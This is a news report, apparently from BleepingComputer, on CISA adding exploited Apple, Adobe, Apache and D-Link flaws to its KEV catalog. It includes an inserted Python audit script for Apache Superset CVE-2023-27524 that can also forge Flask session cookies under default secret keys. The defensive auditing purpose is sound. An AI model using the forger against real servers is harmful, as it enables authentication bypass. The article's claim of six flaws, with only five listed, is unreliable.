The U.S. Cybersecurity and Infrastructure Security Agency has added six vulnerabilities that impact products from Apple, Adobe, Apache, D-Link, and Joomla to its Known Exploited Vulnerabilities catalog.
The Known Exploited Vulnerabilities catalog, or KEV for short, lists security issues that have been actively exploited in the wild.
It is a valuable resource for organizations worldwide when prioritizing vulnerability management, since the flaws in it are known to be used by attackers rather than merely theoretical.
CISA has given federal agencies until January 29 to patch the six actively exploited flaws or stop using the vulnerable products. The flaws listed in the alert include:
CVE-2023-27524 - Insecure default initialization of resource impacting Apache Superset versions up to 2.0.1.
The flaw is exploitable when the default SECRET_KEY shipped in Superset's configuration is left unchanged: Flask, which Superset is built on, signs session cookies with this key, so anyone who knows the default can forge a valid session, authenticate as an existing user, and access unauthorized resources.
CVE-2023-41990 - Remote code execution flaw in the processing of a font file sent as an iMessage attachment, leading to arbitrary code execution on Apple iPhone devices running iOS 16.2 and older.
CVE-2023-38203 - Deserialization of untrusted data in Adobe ColdFusion versions 2018u17 and earlier, 2021u7 and earlier, and 2023u1 and earlier, leading to arbitrary code execution without user interaction.
CVE-2023-29300 - Deserialization of untrusted data in Adobe ColdFusion versions 2018u16 and earlier, 2021u6 and earlier, and 2023.0.0.330468 and earlier, leading to arbitrary code execution without user interaction.
CVE-2016-20017 - Remote unauthenticated command injection vulnerability in D-Link DSL-2750B devices before 1.05, actively exploited from 2016 through 2022.
Some of the listed flaws have been leveraged in attacks that were disclosed only recently.
CVE-2023-41990, for instance, is the last of the four vulnerabilities a threat actor chained to bypass security measures on iPhones belonging to targets around the world, including in Europe, in the campaign Kaspersky tracks as Operation Triangulation.
CVE-2023-38203 and CVE-2023-29300 have been exploited by hackers since mid-2023, after security researchers demonstrated that the vendor's patch for CVE-2023-29300 could be bypassed; the bypass was then assigned CVE-2023-38203 and fixed separately.
For others, like CVE-2023-27524, proof-of-concept exploits were released last September, laying the ground for widespread exploitation by malicious actors.
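The condition CVE-2023-27524 depends on can be tested offline. The following Python script is an added example (not Superset's, Flask's, or BleepingComputer's code): it reimplements Flask's session-cookie signing with the standard library only, so a defender can check whether a captured Superset session cookie verifies under a known default SECRET_KEY, and it shows why that matters by producing a cookie the same way a server with the default key would. The signing scheme it mirrors (itsdangerous URLSafeTimedSerializer, salt "cookie-session", "hmac" key derivation, SHA-1) is what Flask uses; the two candidate default keys are my assumption based on the SECRET_KEY values older superset/config.py releases shipped, and should be verified against the source of the version you run. The sample session is constructed for the example.

```python
"""Audit check for CVE-2023-27524: does a Flask/Superset session cookie verify
under a known default SECRET_KEY?  Stdlib only, no network access needed."""
import base64
import hashlib
import hmac
import json
import time
import zlib

# Flask signs session cookies through itsdangerous' URLSafeTimedSerializer with
# salt "cookie-session", "hmac" key derivation and SHA-1; the helpers below
# reimplement that scheme so no third-party package is required.
SALT = b"cookie-session"

# Assumption: these are the SECRET_KEY defaults shipped in superset/config.py by
# older releases (the first is Python's "\2\1thisismyscretkey\1\2\e\y\y\h").
# Verify them against the source of the version you run before relying on them.
DEFAULT_KEYS = [
    "\x02\x01thisismyscretkey\x01\x02\\e\\y\\y\\h",
    "CHANGE_ME_TO_A_COMPLEX_RANDOM_SECRET",
]


def _b64(data: bytes) -> str:
    """itsdangerous-style base64: URL-safe alphabet, '=' padding stripped."""
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode()


def _b64d(text: str) -> bytes:
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))


def _signature(secret_key: str, signed_value: str) -> str:
    # Key derivation "hmac": HMAC-SHA1(secret_key, salt) yields the signing key;
    # the cookie signature is HMAC-SHA1 of "payload.timestamp" under that key.
    derived = hmac.new(secret_key.encode(), SALT, hashlib.sha1).digest()
    return _b64(hmac.new(derived, signed_value.encode(), hashlib.sha1).digest())


def sign_session(session: dict, secret_key: str, timestamp=None) -> str:
    """Build a Flask-compatible session cookie: payload.timestamp.signature.

    This is what the server does on login, and what an attacker can do offline
    once the key is a known default."""
    ts = int(time.time()) if timestamp is None else timestamp
    payload = _b64(json.dumps(session, separators=(",", ":")).encode())
    ts_part = _b64(ts.to_bytes((ts.bit_length() + 7) // 8, "big"))
    signed_value = f"{payload}.{ts_part}"
    return f"{signed_value}.{_signature(secret_key, signed_value)}"


def find_signing_key(cookie: str, candidates=DEFAULT_KEYS):
    """Return the candidate key whose signature matches the cookie, else None."""
    signed_value, _, sig = cookie.rpartition(".")
    for key in candidates:
        if hmac.compare_digest(_signature(key, signed_value), sig):
            return key
    return None


def decode_payload(cookie: str) -> dict:
    """Decode the session payload without verifying it; a leading '.' marks a
    zlib-compressed payload in itsdangerous' URL-safe format."""
    payload = cookie.rsplit(".", 2)[0]
    if payload.startswith("."):
        return json.loads(zlib.decompress(_b64d(payload[1:])))
    return json.loads(_b64d(payload))


if __name__ == "__main__":
    # Constructed sample: the session a server left on the default key issues.
    cookie = sign_session({"_user_id": "1", "_fresh": True}, DEFAULT_KEYS[1])
    print("cookie:", cookie)
    print("signed with a default key:", find_signing_key(cookie) is not None)
    print("payload:", decode_payload(cookie))
```

If find_signing_key returns a key for a cookie issued by your instance, that instance is exploitable regardless of what the login page shows: set SECRET_KEY in superset_config.py to a long random value (Superset's documentation suggests `openssl rand -base64 42`) and expect existing sessions to be invalidated; because Superset also encrypts stored database credentials with this key, its docs describe running `superset re-encrypt-secrets` as part of the rotation.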
Organizations and federal agencies are urged to check their assets for the above flaws and for the other vulnerabilities listed in the KEV catalog, and to apply the available security updates or mitigation steps as required.
This Cyber News was published on www.bleepingcomputer.com. Publication date: Tue, 09 Jan 2024 19:35:23 +0000